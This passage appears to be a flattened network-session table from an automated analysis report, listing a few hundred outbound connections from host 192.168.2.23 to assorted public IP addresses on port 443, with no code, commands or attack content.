                                          20854192.168.2.2341554171.83.143.153443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20855192.168.2.2338870174.235.167.62443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20856192.168.2.2348278191.77.178.165443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20857192.168.2.2333472113.124.61.65443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20858192.168.2.2353066129.66.232.6443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20859192.168.2.2340828174.58.137.227443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20860192.168.2.2354730177.29.29.44443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20861192.168.2.235835483.155.83.191443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20862192.168.2.234388070.215.155.226443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20863192.168.2.2344784222.84.89.98443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20864192.168.2.2357772126.136.53.154443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20865192.168.2.235908870.136.18.121443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20866192.168.2.233481283.232.78.171443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20867192.168.2.233557646.123.1.185443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20868192.168.2.235119062.252.54.141443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20869192.168.2.2352264163.184.11.210443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20870192.168.2.234338217.203.35.54443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20871192.168.2.2333962139.141.216.147443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20872192.168.2.235894868.103.37.23443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20873192.168.2.234375477.198.8.91443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20874192.168.2.2352052124.174.39.132443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20875192.168.2.2358542157.28.85.179443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20876192.168.2.233873031.241.104.68443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20877192.168.2.2341396196.207.81.98443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20878192.168.2.2333262166.112.163.202443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20879192.168.2.234118257.135.58.58443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20880192.168.2.2337904107.33.170.13443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20881192.168.2.2348636163.177.233.83443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20882192.168.2.235409238.100.103.86443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20883192.168.2.2341826110.163.157.130443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20884192.168.2.23507401.179.168.160443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20885192.168.2.2354852161.25.101.178443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20886192.168.2.2360320109.246.63.137443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20887192.168.2.2359624203.111.187.90443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20888192.168.2.233704674.175.52.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20889192.168.2.234512468.62.200.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20890192.168.2.236074266.37.169.20443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20891192.168.2.2342882109.183.97.82443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20892192.168.2.234059023.68.16.220443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20893192.168.2.2355932103.154.212.168443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20894192.168.2.235687077.236.69.5443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20895192.168.2.2354578204.220.140.63443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20896192.168.2.234040660.147.10.181443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20897192.168.2.234713287.167.52.92443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20898192.168.2.2334086125.146.208.155443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20899192.168.2.234588296.172.16.56443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20900192.168.2.2341952213.74.219.118443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20901192.168.2.2352708191.127.154.109443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20902192.168.2.2338636151.105.164.63443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20903192.168.2.233949223.22.208.222443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20904192.168.2.2344348186.27.140.144443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20905192.168.2.2354274190.181.29.202443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20906192.168.2.2349064149.3.138.7443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20907192.168.2.2358390186.144.152.164443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20908192.168.2.234230842.54.194.137443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20909192.168.2.234363498.152.176.245443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20910192.168.2.234108448.176.106.230443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20911192.168.2.235054873.60.8.170443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20912192.168.2.235623684.103.86.98443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20913192.168.2.234757087.16.11.213443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20914192.168.2.234507880.160.14.229443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20915192.168.2.234151014.226.195.113443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20916192.168.2.2344932117.212.117.155443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20917192.168.2.2356144216.125.215.196443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20918192.168.2.2354982174.43.180.214443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20919192.168.2.2348198172.167.35.59443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20920192.168.2.233964649.151.186.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20921192.168.2.2342234134.33.12.227443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20922192.168.2.2349082128.53.97.30443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20923192.168.2.235165246.218.62.153443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20924192.168.2.2343746211.83.253.10443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20925192.168.2.236033497.2.178.66443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20926192.168.2.234338420.32.245.120443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20927192.168.2.235797463.230.140.13443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20928192.168.2.234187260.183.220.153443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20929192.168.2.2347952102.71.232.7443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20930192.168.2.235808499.13.57.113443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20931192.168.2.2356382201.87.158.250443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20932192.168.2.233430490.173.215.54443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20933192.168.2.2346492202.130.101.53443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20934192.168.2.2342180130.63.136.191443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20935192.168.2.2341766194.156.69.226443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20936192.168.2.2341254146.236.154.253443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20937192.168.2.2346890103.79.56.118443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20938192.168.2.234269499.252.168.140443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20939192.168.2.235602424.54.157.210443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20940192.168.2.233696043.33.225.196443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20941192.168.2.2359032125.8.5.140443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20942192.168.2.236088866.225.144.168443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20943192.168.2.2340748195.126.205.220443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20944192.168.2.2346172102.15.193.103443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20945192.168.2.235979483.165.33.177443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20946192.168.2.2344868190.127.145.233443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20947192.168.2.2354648130.169.71.20443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20948192.168.2.2356044118.152.173.228443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20949192.168.2.233976850.88.59.100443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20950192.168.2.234021879.23.184.240443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20951192.168.2.233367831.217.62.51443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20952192.168.2.235671019.240.123.113443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20953192.168.2.2334280147.173.69.76443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20954192.168.2.234400073.119.234.177443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20955192.168.2.235368278.43.194.253443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20956192.168.2.2339732136.48.18.56443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20957192.168.2.235604089.129.244.210443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20958192.168.2.2348848220.131.250.230443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20959192.168.2.2358634103.58.226.172443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20960192.168.2.235928650.28.166.116443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20961192.168.2.234797038.88.143.79443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20962192.168.2.2349888121.150.161.232443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20963192.168.2.234058035.59.234.178443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20964192.168.2.2358404146.228.12.65443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20965192.168.2.235259819.243.103.170443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20966192.168.2.2358056121.108.19.10443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20967192.168.2.2350886205.186.67.45443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20968192.168.2.234377498.110.255.90443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20969192.168.2.2341666195.113.185.58443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20970192.168.2.2340298135.199.170.165443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20971192.168.2.233934020.235.39.191443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20972192.168.2.2345518168.199.80.113443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20973192.168.2.235485881.85.238.178443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20974192.168.2.235291627.117.154.106443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20975192.168.2.233313439.157.113.138443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20976192.168.2.2360024140.86.27.209443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20977192.168.2.2360102174.0.109.143443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20978192.168.2.2339604114.153.107.172443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20979192.168.2.233283442.225.129.148443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20980192.168.2.234965027.173.1.228443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20981192.168.2.2349620142.192.50.252443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20982192.168.2.235155298.3.120.197443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20983192.168.2.2360008128.81.113.140443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20984192.168.2.234222252.136.196.130443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20985192.168.2.234358271.190.6.151443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20986192.168.2.235898853.98.71.76443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20987192.168.2.235799669.132.30.214443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20988192.168.2.236010854.171.154.199443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20989192.168.2.235470084.112.134.247443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20990192.168.2.2342504134.143.134.188443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20991192.168.2.2348918203.94.35.126443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20992192.168.2.2338814118.1.242.168443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20993192.168.2.2340772130.47.18.52443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20994192.168.2.235624477.99.45.97443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20995192.168.2.235422893.95.120.252443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20996192.168.2.2341676133.32.77.66443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20997192.168.2.234750247.134.255.34443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20998192.168.2.235012293.230.53.193443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20999192.168.2.2349546186.45.107.248443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21000192.168.2.2336892120.37.88.39443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21001192.168.2.2344374173.148.251.94443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21002192.168.2.2337232107.78.183.120443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21003192.168.2.2357384135.243.193.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21004192.168.2.233745423.114.18.138443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21005192.168.2.2353652182.24.113.126443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21006192.168.2.2345936218.50.208.25443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21007192.168.2.234503627.182.26.66443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21008192.168.2.236000495.136.4.129443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21009192.168.2.234474481.50.244.103443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21010192.168.2.233563432.155.176.62443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21011192.168.2.2346916146.251.72.181443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21012192.168.2.2359014104.224.207.61443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21013192.168.2.234902219.105.85.50443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21014192.168.2.2347142138.163.19.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21015192.168.2.2350758123.80.92.100443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21016192.168.2.2340228172.122.40.181443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21017192.168.2.234279212.6.57.103443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21018192.168.2.2347614149.102.68.139443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21019192.168.2.2338282132.206.15.199443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21020192.168.2.2351324172.149.237.110443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21021192.168.2.234867027.193.46.229443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21022192.168.2.233719638.183.7.157443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21023192.168.2.2335404172.207.212.146443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21024192.168.2.2351042119.196.29.182443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21025192.168.2.2346736213.214.173.231443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21026192.168.2.2339102167.49.255.221443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21027192.168.2.234422880.113.93.1443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21028192.168.2.2341554163.25.196.107443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21029192.168.2.2347640166.132.248.173443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21030192.168.2.2352272193.217.91.218443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21031192.168.2.2356990166.149.158.140443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21032192.168.2.23477624.225.74.186443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21033192.168.2.235234845.35.153.112443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21034192.168.2.2336932136.43.24.254443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21035192.168.2.2341002115.148.207.218443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21036192.168.2.2338250201.126.154.112443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21037192.168.2.234658617.56.108.66443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21038192.168.2.2354836138.50.117.140443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21039192.168.2.2333938159.96.232.146443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21040192.168.2.2360660181.255.134.16443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21041192.168.2.234815213.87.6.75443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21042192.168.2.2357630133.75.50.17443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21043192.168.2.2346016178.186.90.237443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21044192.168.2.2351286137.62.89.36443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21045192.168.2.2360866100.17.241.144443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21046192.168.2.234898680.98.130.174443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21047192.168.2.234222474.114.52.43443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21048192.168.2.233466642.225.2.202443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21049192.168.2.2348914110.224.17.28443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21050192.168.2.2344822139.79.162.224443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21051192.168.2.235214870.95.244.10443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21052192.168.2.235623641.102.163.98443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21053192.168.2.233488014.126.51.253443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21054192.168.2.2335796129.32.87.105443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21055192.168.2.235004817.118.54.242443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21056192.168.2.2337130168.77.9.214443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21057192.168.2.234615879.90.24.158443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21058192.168.2.235194497.179.139.85443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21059192.168.2.2337296112.171.46.47443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21060192.168.2.235756252.245.13.112443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21061192.168.2.233521852.115.64.155443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21062192.168.2.2341286193.51.179.86443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21063192.168.2.233914478.206.143.118443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21064192.168.2.2343660126.147.239.253443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21065192.168.2.234571043.107.87.143443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21066192.168.2.2359994136.212.62.218443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21067192.168.2.2342386192.178.209.121443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21068192.168.2.234124636.198.48.8443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21069192.168.2.2344318189.85.171.68443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21070192.168.2.23567108.196.180.162443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21071192.168.2.2355450153.64.27.56443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21072192.168.2.2344450169.9.119.201443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21073192.168.2.2354456100.215.134.133443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21074192.168.2.234860046.128.128.18443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21075192.168.2.233892273.42.217.254443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
